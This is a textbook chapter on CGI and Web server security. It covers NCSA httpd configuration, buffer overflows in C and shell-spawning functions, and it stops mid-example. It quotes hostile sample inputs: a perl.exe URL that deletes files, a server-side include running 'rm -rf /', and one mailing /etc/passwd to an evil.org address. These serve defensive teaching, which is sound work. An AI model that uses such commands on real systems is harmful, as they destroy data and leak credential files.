Chapter 9
CGI Security
Unless you've programmed network software
in the past, security has probably been the least of your programming
concerns. After all, you don't need to worry about writing insecure
programs on a single-user machine because, presumably, only one
person has access to the machine anyway.
However, programming software designed for use over the Internet
requires a different paradigm of programming with a much greater
emphasis on security. There's an old computer maxim that says
the only way to truly secure a computer is to disconnect it from
the rest of the world and keep it in a locked room. Simply connecting
the machine to a network weakens your machine's security.
This especially holds true for a large scale "network of
networks" like the Internet, where literally millions of
people potentially have access to your computer. Many of the services
over the Internet, especially the World Wide Web, were designed
so that other people could easily access information from your
computer. Each of these services you make available (either consciously
or inadvertently) is another possible door for a wily, malicious
user to exploit. A badly written network server can be easily
compromised, potentially giving someone access to your entire machine
and your important data.
What do I mean when I say that every network service you provide
is like another door on your system? What exactly constitutes
a security breach? For all intents and purposes, a security
breach is when a person gains unauthorized access to your
machine. "Unauthorized access" can mean many things
ranging from running a program on the server not meant to be publicly
run to obtaining root access on a UNIX machine.
For security, you depend largely on the knowledge and care of
the programmers who wrote the network servers. After
all, no one can expect you to sift carefully through thousands
of lines of source code simply to make sure there are no security
holes in the software; for the most part, you depend on the reliability
of the programmer and other experts who have sifted through source
code and carefully tested the software. While past incidents such
as the Internet Worm have demonstrated that you cannot completely
trust programmers to write perfectly secure code, you can take
steps to minimize the risk.
Later, in "Securing Your Web Server," you learn about Web
server security. For the moment, assume your Web server software
is secure and properly configured; that is, no one can gain unauthorized
access to your machine through your Web server alone. Why is it
important to write secure CGI scripts? CGI is a generic protocol
that enables you to extend the Web server. By writing a CGI program,
you are adding functionality to the Web server, functionality
that might inadvertently introduce new security holes. A carelessly
written CGI application can allow anyone full access to your machine.
When users submit a form or access a CGI script in another manner,
you are essentially allowing them to run an application remotely
on your machine. Because many CGI applications accept some form
of user input (either through a fill-out form or from the command
line), to some extent you are allowing users to control how the
CGI application is run. As a CGI author, you need to make sure
that your CGI script can be used only for its specified purpose.
This chapter goes over related Web-security issues and provides
in-depth information on writing secure CGI programs. At the end
of this chapter, you also learn how to write CGI for secure transactions.
Overall security of your Web serving machine depends on many factors.
A secure CGI program is useless if your server is misconfigured
or if there are other holes on your system. I discuss some of
the related Web security issues here and explain how to properly
configure your Web server for CGI.
A common question is which platform is more secure for a Web server:
a Macintosh running System 7, a UNIX workstation, a PC running
OS/2, and so on. There have been many wars on this topic, each
of which reflects people's different biases toward different operating
systems.
No operating system is clearly more secure than another. UNIX
is arguably more secure than a single-user platform such as a
Macintosh or a PC running Windows, because once a user breaks
into one of these latter machines, he or she has access to all
your files. UNIX, however, has a fundamental understanding of
file ownerships and permissions. If your server is configured
correctly and is owned by a safe (for example, non-root) user,
then if someone unauthorized breaks in, he or she can do only
limited damage. Limited damage, however, can be bad enough, as
you will see in the examples later in this chapter.
On the other hand, because UNIX often comes preconfigured with
many different types of network services such as mail, FTP, Gopher,
WWW, and so on, there are more potential "doors" for
someone to enter. Securing all of these services is a difficult
and time-consuming process, even for the experienced administrator.
Even if you configure everything correctly, you are still at the
mercy of possible bugs in each individual package. Security flaws
in various packages are not uncommon, as is clear from the frequency
of notices of insecurities in various common UNIX network services
from organizations such as the Computer Emergency Response Team
(CERT).
Every platform has its own security implications,
but none is inherently more secure than the others. Although you should be
aware of the implications of each operating system, they should
not be your primary criterion when choosing a platform. Choose
your platform, seal off the holes associated with that platform,
and then configure your Web server securely and correctly. Only
after you have completed these steps should you concern yourself
with writing secure CGI scripts.
The first step in writing secure CGI scripts is to make sure your
Web server is securely and properly configured. If your Web server
is not secure, it does not matter how carefully you write your
CGI scripts; people can still break into your machine. Additionally,
configuring your Web server correctly helps minimize the potential
damage of a badly written CGI program.
Choosing a Secure Web Server
There are countless Web servers available for a variety of platforms, and deciding which products are secure is a difficult if not impossible task. As with any product, you will need to rely on company reputation and word of mouth.
Examine your options. After you have a list of Web servers, look at how long each product has been available and how many people currently use it. The older and more frequently used the Web server, the more likely security bugs have been found and fixed. If the code is freely available and if you have some time and expertise, look through the source code yourself and see if you can find a potential hole. Read what people on the various Web Usenet newsgroups have to say about each product and its authors or publishers. Reputable companies or authors will inform their users immediately about any problems with their product. Read the various security alerts from organizations such as CERT and CIAC (Computer Incident Advisory Capability).
Examine the feature-set and determine whether you really need all of the features. The more complex and powerful the server, the more likely there is an undetected security hole. Make sure your server supports logging so you can trace the cause of security break-ins or other trouble.
Have a contingency plan. Be prepared to quickly upgrade or replace your Web server if a security hole is discovered. Pay attention to news releases and the newsgroups for information regarding your Web server. Try to use the latest non-beta version of the Web server.
Don't be afraid of the free servers. There is debate over whether providing source code makes a server more or less secure. If the server source is not available, security holes are more difficult to discover. If the source is available, however, then theoretically holes can be discovered, announced, and patched quickly.
You should have three goals when securing your Web server:
- Configure your programs to do only what
you want them to do, nothing more.
- Don't reveal any more information than
necessary.
- Minimize the potential damage if someone
breaks in.
The more I know about your computer, the better equipped I am
to break into it. For example, if I know in which directory or
folder all of your sensitive, private information is stored,
I have narrowed my objective from gaining total access to your
machine to simply gaining access to a directory, usually a simpler
task. Or if I have access to your server configuration files or
the source code of your CGI scripts, I can easily browse through
them looking for potential security holes. If there are holes
in your system, you don't want to make it easy for others to know
about them, and you want to find them before others do.
Where Should You Put Your CGI?
As discussed earlier in Chapter 2, "The
Basics," most Web servers enable you to run CGI programs
in many different ways. For example, you could designate a specific
directory as your cgi-bin. Alternatively, you could allow CGI
to be stored in any directory.
There are advantages and disadvantages to both, but from a security
standpoint, it is better to designate one directory to store all
of your CGI applications. Having all of your programs in one directory
makes it easier to keep track of all of the applications on your
server and to audit them for potential security holes. It also
helps prevent tampering. If your scripts are located in several
different directories, you need to constantly check each one of
these for tampering.
If you tend to use a scripting language (such as Perl) for most
of your applications, then the source code is contained within
the application itself. This code, then, is potentially vulnerable
to being read, and exploited, if you're not careful. For example,
many text editors save backup files, usually appending some extension
to the end of the filename (such as .bak).
For example, emacs saves a backup of filename as filename~.
Suppose that you have a CGI script written in Perl, program.cgi, stored
in one of the Web data directories rather than in a central designated
directory. Now suppose that you made a trivial change to the program
using emacs and forgot to remove the backup file. You now have
two files in your directory: program.cgi and program.cgi~. The
Web server knows that files ending in .cgi are CGI programs and
will run the program rather than display its content. However,
a smart user might try to access program.cgi~ instead. Because
it does not end in .cgi, your Web server sends it as a raw text
file, thus allowing the user to search your source code for possible
holes. This violates the second goal listed earlier: don't reveal
any more information than necessary.
However, if your server enables you to specify all files located
in a certain directory as a CGI, it doesn't matter what the extension
of the file is. In the earlier example, if the backup
file were located in a properly designated directory and a user
tried to access it, the server would try to run the program rather
than send the source code.
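If some of your scripts must live in the document tree, it helps to check regularly for stray backup copies such as program.cgi~. The following C fragment is a minimal sketch of such a check, not a complete auditing tool. The function names (ends_with, looks_like_backup) and the list of suffixes are assumptions chosen for illustration; adjust the list to match the editors used on your system.

```c
#include <stddef.h>
#include <string.h>

/* Return 1 if `name` ends with `suffix`, 0 otherwise. */
static int ends_with(const char *name, const char *suffix)
{
    size_t n = strlen(name);
    size_t s = strlen(suffix);

    return n >= s && strcmp(name + n - s, suffix) == 0;
}

/*
 * Return 1 if `name` looks like an editor backup copy of a file.
 * The suffix list is an illustrative assumption, not an exhaustive one.
 */
int looks_like_backup(const char *name)
{
    static const char *suffixes[] = { "~", ".bak", ".orig", ".old" };
    size_t i;

    for (i = 0; i < sizeof suffixes / sizeof suffixes[0]; i++) {
        if (ends_with(name, suffixes[i]))
            return 1;
    }
    return 0;
}
```

A maintenance program could call looks_like_backup() on each filename it finds while walking the document tree and report or remove the matches.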
Note that designating a central directory as the location of all
CGI programs on your server is limiting, especially on a multiuser
system. For example, if you are an Internet Service Provider and
you want to allow your users to write and run their own CGI, you
might be inclined to allow CGI to be stored in any directory.
Before you do this, consider the alternative options carefully.
Are your clients going to be writing a lot of special customized
scripts? If not, it is better to have your clients submit the
scripts for auditing before being added to the cgi-bin
directory rather than enabling CGI in all directories.
Another issue regarding the location of CGI programs is where
to put the interpreter. For interpreted scripts, the server runs
the interpreter, which in turn loads the script and executes it.
Never put the interpreter in your cgi-bin
directory, or in any directory in your data tree for that matter.
Giving users access to the interpreter essentially gives them
the power to run any application or any series of commands on
your system.
This is especially important if you use a Windows or other non-UNIX
operating system. In UNIX, you can specify the interpreter in
the first line of your script. For example:
#!/usr/local/bin/perl
# this first line says use Perl to run the following script
In Windows, for example, there is no analogous method of specifying
the interpreter within the script. One way to call a Perl script
would be to create a batch file that calls Perl and the script.
rem progname.bat
rem a wrapper for my perl script, progname.pl
c:\perl\perl.exe progname.pl
However, you might be inclined to avoid creating this extra program
by simply putting perl.exe in your cgi-bin
directory and accessing the following URL:
http://hostname/cgi-bin/perl.exe?progname.pl
This works, but it also enables anyone in the world to run any
Perl command on your machine. For example, someone could access
the following URL:
http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B
Decoded, the previous line is equivalent to calling Perl and running
the following one-line program, which will delete all the files
in the current directory. Clearly, this is undesirable.
unlink <*.*>;
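To see how the query string in that URL turns into a Perl command, it helps to decode it by hand: each plus sign becomes a space, and each %XX sequence becomes the character with that hexadecimal code. The following C function is a minimal sketch of that decoding step. The names url_decode and hex_value and the interface are assumptions made for this illustration; they do not come from any particular server or library.

```c
#include <ctype.h>
#include <stddef.h>

/* Convert one hexadecimal digit to its value; the caller has
   already checked the character with isxdigit(). */
static int hex_value(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return c - 'A' + 10;
}

/*
 * Decode a URL-encoded string into `out`, which holds `outsize` bytes.
 * '+' becomes a space and %XX becomes the byte with hex value XX.
 * Returns the decoded length, or -1 if the result does not fit.
 */
int url_decode(const char *in, char *out, size_t outsize)
{
    size_t o = 0;

    if (outsize == 0)
        return -1;
    while (*in != '\0') {
        char c;

        if (*in == '+') {
            c = ' ';
            in++;
        } else if (*in == '%' &&
                   isxdigit((unsigned char)in[1]) &&
                   isxdigit((unsigned char)in[2])) {
            c = (char)(hex_value(in[1]) * 16 + hex_value(in[2]));
            in += 3;
        } else {
            c = *in++;
        }
        if (o + 1 >= outsize) {   /* no room for this byte plus the NUL */
            out[o] = '\0';
            return -1;
        }
        out[o++] = c;
    }
    out[o] = '\0';
    return (int)o;
}
```

Passing the query string from the malicious URL to url_decode() yields the text -e unlink <*.*>; which is what ends up on Perl's command line.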
You will never have a reason to put an interpreter in your cgi-bin
directory (or any directory capable of running CGI), so never
do it. Some Windows servers can determine the type of script by
its extension and run the appropriate interpreter. For example,
Win-HTTPD assumes every CGI script ending in .pl is a Perl script
and will run Perl automatically. If your Web server does not have
this feature, use a wrapper script like the first Windows Perl
example earlier in this chapter.
Should I Use an Interpreter?
You should never even be tempted to put an interpreter in your cgi-bin if you are using a UNIX or Macintosh Web server. As noted earlier, UNIX enables you to specify the location of the interpreter within the script. To enable scripts on a Macintosh, you associate the script with the appropriate interpreter by editing the resource using a utility such as ResEdit.
Server-Side Includes
In Chapter 4, "Output," you learned
a few reasons why you should avoid server-side includes. A common
reason often raised is security. Specifically, some implementations
of server-side includes (notably NCSA and Netscape) enable users
to embed the output of programs in an HTML document. Every time
one of these HTML files is accessed, the program is run on the
server-side and the output is displayed as part of the HTML document.
By allowing this sort of server-side include, you become susceptible
to a few potential security risks. First, on a UNIX machine, the
programs are run by the owner of the server, not the owner of
the program. If your server isn't properly configured and you
have sensitive files or programs owned by the server owner, these
files and programs and their output become accessible by users
on your machine.
This risk increases if you allow users to edit HTML files on your
system from Web browsers. A common example of this is a guestbook.
In a guestbook, users fill out a form and submit messages to a
CGI program, which will often simply append the unedited message
to an HTML file, the guestbook. By not editing or filtering the
submitted message, you allow the user to submit HTML code from
his or her browser. If you allow programs to be executed in a
server-side include, a malicious user can wreak havoc on your
machine by submitting a tag like the following:
<!--#exec cmd="/bin/rm -rf /"-->
This server-side include will attempt to delete everything it
can on your machine.
Note that you could have prevented this problem in several ways
without having to completely turn off server-side includes. You
could have filtered out all HTML tags before appending the submitted
text to your guestbook. Or you could have disabled the exec
capability of your server-side include (I show you how to do this
for the NCSA server later in this chapter in "Example: Securely
Configuring the NCSA Server").
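As a rough sketch of the first approach, the following C function neutralizes submitted text before it is appended to the guestbook. Note that it escapes the special characters rather than stripping the tags, which is a slightly different technique from filtering but has the same effect: neither the server nor the browser ever sees a tag in the submitted message. The function name html_escape and its interface are assumptions for this example.

```c
#include <stddef.h>
#include <string.h>

/*
 * Copy `in` to `out`, replacing the characters that are special in
 * HTML with entities so that the text is displayed literally.
 * Returns 0 on success, -1 if `out` (outsize bytes) is too small.
 */
int html_escape(const char *in, char *out, size_t outsize)
{
    size_t o = 0;

    if (outsize == 0)
        return -1;
    for (; *in != '\0'; in++) {
        const char *rep;
        char single[2];
        size_t len;

        switch (*in) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        default:
            single[0] = *in;
            single[1] = '\0';
            rep = single;
            break;
        }
        len = strlen(rep);
        if (o + len >= outsize) {   /* leave room for the NUL */
            out[o] = '\0';
            return -1;
        }
        memcpy(out + o, rep, len);
        o += len;
    }
    out[o] = '\0';
    return 0;
}
```

Run through this function, the malicious tag shown earlier no longer begins with a less-than sign, so the server does not recognize it as a server-side include.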
If you forgot to do either of these things, other precautions
you should have taken would have greatly minimized the damage
on your machine by such a tag anyway. For example, as long as
your server was running as a nonexistent, non-root user, this
tag would most likely not have deleted anything of any importance,
perhaps nothing at all. Suppose that instead of attempting to
delete everything on your disks, the malicious user attempted
to obtain your /etc/passwd
for hopeful cracking purposes using something like the following:
<!--#exec cmd="/bin/mail me@evil.org < /etc/passwd"-->
However, if your system uses the shadow password suite, then
your /etc/passwd contains no information
useful to potential hackers.
This example demonstrates two important things about both server-side
includes and CGI in general. First, security holes can be completely
hidden. Who would have thought that a simple guestbook program
on a system with server-side includes posed a large security risk?
Second, the potential damage of an inadvertent security hole can
be greatly minimized by carefully configuring your server and
securing your machine as a whole.
Although server-side includes add another potentially useful dimension
to your Web server, think carefully about the potential risks,
as well. In Chapter 4, I offer several
alternatives to using server-side includes. Unless you absolutely
need to use server-side includes, you might as well disable them
and close off a potential security hole.
Securing Your UNIX Web Server
A secured UNIX system is a powerful platform for serving Web documents.
However, there are many complex issues associated with securing
and properly configuring a UNIX Web server. The very first thing
you should do is make sure your machine is as secure as possible.
Disable network services you don't need, no matter how harmless
you think they are. It is highly unlikely that anyone can break
into your machine using the finger
protocol, for example, which only answers queries about users.
However, finger can give
hackers useful information about your system.
Secure your system internally. If a hacker manages to break into
one user's account, make sure the hacker cannot gain any additional
privileges. Useful actions include installing a shadow password
suite and removing all setuid scripts (scripts that are set to
run as the owner of the script, even if called by another user).
Securing a UNIX machine is a complex topic and goes beyond the
scope of this book. I highly recommend that you purchase a book
on the topic, read the resources available on the Internet, even
hire a consultant if necessary. Don't underestimate the importance
of securing your machine.
Next, allot separate space for your Web server and document files.
The intent of your document directories is to serve these files
to other people, possibly to the rest of the world, so don't put
anything in these directories that you wouldn't want anyone else
to see. Your server directories contain important log and configuration
information. You definitely do not want outside users to see this
information, and you most likely don't want most of your internal
users to see it or write to it either.
Set the ownership and permissions of your directories and server
wisely. It's common practice to create a new user and group specifically
to own Web-related directories. Make sure nonprivileged users
cannot write to the server or document directories.
Your server should never be "running as root." This statement
is somewhat misleading. In UNIX, only root can bind to ports
below 1024. Because by default Web servers run on port 80,
you need to be root to start a Web server. However, after the
Web server is started as root, it can either change its own process's
ownership (if it's internally threaded) or change the ownership
of its child processes that handle connections (if it's a forking
server). Either method allows the server to process requests as
a non-root user. Make sure you configure your Web server to "run
as non-root," preferably as a completely nonexistent user
such as "nobody." This limits the potential damage if
you have a security hole in either your server or your CGI program.
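The privilege change described above can be sketched in C as follows. This is a simplified illustration of the general technique, not the code of NCSA httpd or any other server. The function name drop_privileges is an assumption, and a real server would first look up the numeric IDs of its configured user and group (for example, with getpwnam) before calling it.

```c
#include <sys/types.h>
#include <unistd.h>

/*
 * Switch the calling process to the given unprivileged user and group.
 * Intended to be called by a server that was started as root, after it
 * has bound its listening socket to port 80.
 * Returns 0 on success, -1 on failure.
 */
int drop_privileges(uid_t uid, gid_t gid)
{
    /* Change the group first: once the user ID is no longer root,
       the process may not be allowed to change its group. */
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;

    /* Confirm that both the real and effective IDs changed. */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid)
        return -1;
    return 0;
}
```

A production server would also reset its supplementary group list before changing the user ID; I have omitted that step to keep the sketch short.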
Disable all features unless you absolutely need them. If you initially
disable a feature and then later decide you want to use it, you
can always turn it back on. Features you might want to disable
include server-side includes and serving symbolic links.
If your users don't need to serve their personal Web documents
from your server, disable public Web directories. This enables
you to have complete and central control over all documents served
from your machine, an important quality for general maintenance
and security.
If your users do need to serve their personal documents (for example,
if you are an Internet Access Provider), make sure they cannot
override your main configuration. Seriously consider whether users
need the ability to run CGI programs from their own personal directories.
As stated earlier, it's preferable to store all CGI in one centralized
location.
CGIWRAP
A popular package available on the Web is cgiwrap, written by Nathan Neulinger (nneul@umr.edu). This package enables users to run their own CGI programs by running the program as the owner of the program rather than the owner of the server.
It's not clear whether this is more or less beneficial than simply allowing anyone to run his or her own CGI programs unwrapped. On one hand, a bad CGI script has the capability to do less damage owned by nobody rather than by a user who actually exists. On the other hand, if the CGI program does damage the system as nobody, the responsibility lies on the system administrator, whereas if only a specific user's files were damaged, it would ultimately be the user's responsibility.
My advice would be to not go with either option and simply disallow unaudited user CGI programs. If this is unacceptable, then ultimately whether you use cgiwrap or a similar program depends on where you want the responsibility to lie.
Finally, you might want to consider setting up a chroot
environment for your Web documents. In UNIX, you can protect a
directory tree by using chroot.
A server running inside of a chrooted
directory cannot see anything outside of that directory tree.
Under a chrooted environment,
if someone manages to break in through your Web server, they can
damage files only within that directory tree.
Note, however, that a chrooted
environment is appropriate only for a Web server serving a single
source of documents. If your Web server is serving users' documents
in multiple directories, it is nearly impossible to set up an
effective chrooted environment.
Additionally, a chrooted
environment is weakened by the existence of interpreters (such
as Perl or a shell). In a chrooted
environment without any shells or interpreters, someone who has
broken in can at worst change or damage your files; with an interpreter,
potential damage increases.
Example: Securely Configuring the NCSA Server
I'll demonstrate how one might go about properly configuring a
common Web server on a UNIX environment by discussing the NCSA
Server (v1.4.2). There are many Web servers available for UNIX,
but NCSA is one of the oldest, is commonly used, is freely available,
and is fairly easy to configure. I will demonstrate only the configuration
I think is most relevant to securing the Web server; for more
detailed instructions on configuring NCSA httpd, look at its Web
site: http://hoohoo.ncsa.uiuc.edu/.
You can apply the principles demonstrated here to almost any UNIX
Web server.
First, I need to present the criteria. In this scenario, I want
to set up the NCSA server on a secured UNIX machine for a small
Internet service provider called MyCompany. The machine's host
name is www.mycompany.net.
I want everyone with an account on my machine to be able to serve
his or her own Web documents and possibly use CGI or other features.
What features do I absolutely need? In this case, because I'm
a small Internet service provider, I will not let users serve
their own CGI. If they want to write and use their own CGI programs,
they must submit it to me for auditing; if it's okay, I'll install
it. Additionally, I'll provide general programs that are commonly
requested, such as guestbooks and generic form-processing applications.
I don't need any other features for now in this scenario, including
server-side includes.
Here is how I'm going to configure my Web server. I will create
the user and group www; these
will own all of the appropriate directories. I will create one
directory for my server files (/usr/local/etc/httpd/)
and one directory for the Web documents (/usr/local/etc/httpd/htdocs/).
Both directory trees will be world readable and user and group
writeable.
Now, I'm ready to configure the server. NCSA httpd has three configuration
files: access.conf, httpd.conf, and srm.conf. First, you need
to tell httpd where your server and HTML directories are located.
In httpd.conf, specify the server directory with the following
line:
ServerRoot /usr/local/etc/httpd
In srm.conf, specify the document directory with
DocumentRoot /usr/local/etc/httpd/htdocs
Because I want to designate all files in /usr/local/etc/httpd/cgi-bin
as CGI programs, I include the following line in srm.conf:
ScriptAlias /cgi-bin/ /usr/local/etc/httpd/cgi-bin/
Note that the actual location of my cgi-bin
directory is not in my document tree but in my server tree. Because
I want to keep my server directory (including the directory containing
the CGI) as private as possible, I keep it outside of the document
directory. If I have a CGI in this directory called mail.cgi,
I can access it by using the URL
http://www.mycompany.net/cgi-bin/mail.cgi
One other line in srm.conf needs to be edited; it's not particularly
relevant to our specific quest of securing the server, but for
completeness sake, I'll mention it anyway:
Alias /icons/ /usr/local/etc/httpd/icons/
The Alias directive enables
you to specify an alias for a directory either in or out of your
document directory tree. Unlike the ScriptAlias
directive, Alias does not
change the meaning of the directory in any other way.
Because I want to disable server-side includes and not allow CGI
in any directory other than cgi-bin,
I comment out the following lines in srm.conf by inserting a pound sign
(#) in front of each line.
#AddType text/x-server-parsed-html .shtml
#AddType application/x-httpd-cgi .cgi
AddType enables you to associate
MIME types with filename extensions. text/x-server-parsed-html
is the MIME type for parsed HTML (for example, HTML with embedded
tags for server-side includes) whereas application/x-httpd-cgi
is the type for CGI applications. I don't need to specify the
extension for this MIME type in this case because I've configured
the server to assume that everything in the cgi-bin,
regardless of filename extension, is a CGI.
Finally, I need to set properties and access restrictions to certain
directories by editing the global access.conf file. To define
global parameters for all the directories, simply put the directives
in the file without any surrounding tags. In order to specify
parameters for specific directories, surround the directives with
<Directory directoryname>
tags, where directoryname is
the full path of the directory.
By default, the following global options are set:
Options Indexes FollowSymLinks
Indexes allows the server to return a generated listing of a
directory when the URL names a directory that has no index file.
The name of the index file, specified by DirectoryIndex
in srm.conf, is set to index.html by default,
which is fine for my purposes. FollowSymLinks
means that the server will return the data to which the symbolic
link is pointing. I see no need for this feature, so I'll disable
it. Now, this line looks like the following:
Options Indexes
If I wanted to allow CGI programs in any directory, I could do
so by including the option ExecCGI.
Options Indexes ExecCGI
This line, along with the AddType
directive in srm.conf, would allow me to run a CGI in any directory
by adding the extension .cgi to all CGI programs.
By default, NCSA httpd is configured so that all of the settings
in access.conf can be overridden by creating an .htaccess file
in the specific directory with the appropriate properties and
access restrictions. In this case, I don't mind if users change
their own access restrictions. However, I don't want users to
give themselves the ability to run CGI in their directories by
putting the following lines in an .htaccess file:
AddType application/x-httpd-cgi .cgi
Options Indexes ExecCGI
Therefore, I edit access.conf to allow the user to override all
settings except for Options.
AllowOverride FileInfo AuthConfig Limit
My server is now securely configured. I have disallowed CGI in
all but the cgi-bin directory,
and I've completely disallowed server-side includes. The server
runs as user nobody, a nonexistent
user on my system. I've disabled all features I don't
need, and users cannot override these important restrictions.
For more information on the many other configurations, including
detailed access restrictions, refer to the NCSA server documentation.
At this point, you have presumably secured your machine and your
Web server. You are finally ready to learn how to write a secure
CGI program. The basic principles for writing secure CGI are similar
to the ones outlined earlier:
- Your program should do what you want and
nothing more.
- Don't give the client more information
than it needs to know.
- Don't trust the client to give you the
proper information.
I've already demonstrated the danger of violating the first principle
with the guestbook example. I present a few other common mistakes
that can open up holes, but you need to remember to consider all
of the implications of every function you write or use.
The second principle is simply an extension of a general security
principle: the less the outside world knows about the inside of
your system, the less-equipped outsiders are to break in.
The last principle is not just a good programming rule of thumb
but a good security one, as well. CGI programs should be robust.
One of the first things a hacker will try to do to break into
a machine through a CGI program is to try to confuse it by experimenting
with the input. If your program is not robust, it will either
crash or do something it was not designed to do. Both possibilities
are undesirable. To combat this possibility, don't make any assumptions
about the format of the information or the values the client will
send.
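One way to avoid such assumptions is to check every value against a list of characters you are prepared to accept and to reject everything else. The following C function is a minimal sketch of this idea. The name is_acceptable, the length limit, and the particular set of allowed characters are assumptions for illustration and should be chosen to suit each field.

```c
#include <stddef.h>
#include <string.h>

/*
 * Return 1 if `value` is non-empty, at most `maxlen` characters long,
 * and made up only of characters from the allowed set; 0 otherwise.
 */
int is_acceptable(const char *value, size_t maxlen)
{
    /* Illustrative allow list: letters, digits, and a few
       punctuation characters. */
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789"
        "_-.@";
    size_t len;

    if (value == NULL)
        return 0;
    len = strlen(value);
    if (len == 0 || len > maxlen)
        return 0;
    /* strspn counts the leading characters found in `allowed`; the
       value passes only if that count covers the whole string. */
    return strspn(value, allowed) == len;
}
```

For example, is_acceptable("me@evil.org", 64) succeeds, while a value such as "me@evil.org; rm -rf /" is rejected because it contains a semicolon, spaces, and slashes.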
The most bare-bones CGI program is a simple input/output program.
It takes what the client tells it and returns some response. Such
a program offers very little risk (although possible holes still
exist, as you will later see). Because the CGI program is not
doing anything interesting with the input, nothing wrong is likely
to happen. However, once your program starts manipulating the
input, possibly calling other programs, writing files, or doing
anything more powerful than simply returning some output, you
risk introducing a security hole. As usual, power is directly
proportional to security risk.
Different languages have different inherent security risks. Secure
CGI programs can be written in any language, but you need to be
aware of each language's quirks. I discuss only C and Perl here,
but some of the traits can be generalized to other languages.
For more specific information on other languages, refer to the
appropriate documentation.
Earlier in this chapter you learned that in general, compiled
CGI programs are preferable to interpreted scripts. Compiled programs
have two advantages: first, you don't need to have an interpreter
accessible to the server, and second, source code is not available.
Note that some traditionally interpreted languages such as Perl
can be compiled into a binary. (For information on how to do this
in Perl, consult Larry Wall and Randal Schwartz's Programming
Perl, published by O'Reilly and Associates.) From a security
standpoint, a compiled Perl program is just as good as a compiled
C program.
Lower-level languages such as C suffer from a problem called a
buffer overflow. C doesn't have a good built-in method
of dealing with strings. The traditional method is to declare
either an array of characters or a pointer to a character. Many
have a tendency to use the former method because it is easier
to program. Consider the two equivalent excerpts of code in Listings
9.1 and 9.2.
Listing 9.1. Defining a string using an array in C.
#include <stdio.h>
#include <string.h>
#define message "Hello, world!"
int main()
{
char buffer[80];
strcpy(buffer,message);
printf("%s\n",buffer);
return 0;
}
Listing 9.2. Defining a string using a pointer in C.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define message "Hello, world!"
int main()
{
char *buffer = malloc(sizeof(char) * (strlen(message) + 1));
strcpy(buffer,message);
printf("%s\n",buffer);
return 0;
}
Listing 9.1 is much simpler than Listing 9.2, and in this specific
example, both work fine. This is a contrived example; I already
know the length of the string I am dealing with, and consequently,
I can define the appropriate length array. However, in a CGI program,
you have no idea how long the input string is. If message,
for example, were 80 characters or longer, the code in Listing
9.1 would write past the end of the array and most likely crash.
This is called a buffer overflow, and smart hackers can
exploit these to remotely execute commands. The buffer overflow
was the bug that afflicted NCSA httpd v1.3. It's a good example
of how and why a network (or CGI) programmer needs to program
with more care. On a single-user machine, a buffer overflow simply
leads to a crash. There is no advantage to executing programs
using a buffer overflow on a crashed single-user machine because
presumably (with the exception of public terminals), you could
have run any program you wanted anyway. However, on a networked
system, a crashed CGI program is more than a nuisance; it's a
potential door for unauthorized users to enter.
The code in Listing 9.2 solves two problems. First, it dynamically
allocates enough memory to store the string. Second, notice that
I added 1 to the length of
the message. I actually allocate enough memory for one more character
than the length of the string. This leaves room for the terminating
null character. The strlen() function does not count the null
character, but strcpy() copies it along with the rest of the string,
so the target must be one character longer than the string's length.
Keep in mind that there's no reason to assume that the input sent
to the CGI script ends in a null character; when you read raw input
yourself, you need to place one at the end explicitly.
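The same allocate-and-terminate idea can be applied to input whose length is only known at run time. The following is a minimal sketch, assuming the length arrives as a decimal string (as in the CONTENT_LENGTH environment variable for POST requests). The function name read_body() and the MAX_BODY_LEN limit are hypothetical and chosen only for this example.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical upper bound; refuse anything larger instead of allocating it. */
#define MAX_BODY_LEN 65536L

/* Reads exactly the number of bytes announced in content_length from in and
   returns them as a newly allocated, null-terminated string. Returns NULL on
   a missing, malformed, or oversized length, on short input, or if malloc()
   fails. The caller frees the result. */
char *read_body(FILE *in, const char *content_length)
{
    char *end, *buffer;
    long len;

    assert(in != NULL);                 /* caller bug, not bad input */
    if (content_length == NULL || *content_length == '\0')
        return NULL;
    len = strtol(content_length, &end, 10);
    if (*end != '\0' || len < 0 || len > MAX_BODY_LEN)
        return NULL;
    buffer = malloc((size_t) len + 1);  /* +1 for the terminating null */
    if (buffer == NULL)
        return NULL;
    if (fread(buffer, 1, (size_t) len, in) != (size_t) len) {
        free(buffer);
        return NULL;
    }
    buffer[len] = '\0';                 /* the input carries no terminator */
    return buffer;
}
```

In a CGI program, a call might look like read_body(stdin, getenv("CONTENT_LENGTH")). The buffer is sized from the announced length, never from a fixed guess, and the announced length itself is checked before it is trusted.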
Provided your C programs avoid problems such as buffer overflows,
you can write secure CGI programs. However, this is a tough provision,
especially for large, more complicated CGI programs. Problems
like this force you to spend more time thinking about low-level
programming tasks rather than the general CGI task. For this reason,
you might prefer to program in a higher-level programming language
(such as Perl) that robustly handles such low-level tasks.
However, there is a flip side to the high-level nature of Perl.
Although you can assume that Perl will properly handle string
allocation for you, there is always the danger that Perl is doing
something in a high-level syntax of which you are not aware. This
will become clearer in the next section on shell dangers.
Many CGI tasks are most easily implemented by running other programs.
For example, if you were to write a CGI mail gateway, it would
be silly to completely reimplement a mail transport agent within
the CGI program. It's much more practical to pipe the data into
an existing mail transport agent such as sendmail and let sendmail
take care of the rest of the work. This practice is fine and is
encouraged.
The security risk depends on how you call these external programs.
There are several functions that do this in both C and Perl. Many
of these functions work by spawning a shell and by having the
shell execute the command. These functions are listed in Table
9.1. If you use one of these functions, you are vulnerable to
weaknesses in UNIX shells.
Table 9.1. Functions in both C and Perl that spawn
a shell.
Perl Functions | C Functions
system('...') | system()
open('| ...') | popen()
exec('...') |
eval('...') |
`...` |
Why are shells dangerous? There are several nonalphanumeric characters
that are reserved as special characters by the shell. These characters
are called metacharacters and are listed in Table 9.2.
Table 9.2. Shell metacharacters.
;  <  >  *  |  `  &  $  !  #  (  )  [  ]  :  {  }  '  "
Each of these metacharacters performs special functions within
the shell. For example, suppose that you wanted to finger a machine
and save the results to a file. From the command line, you might
type:
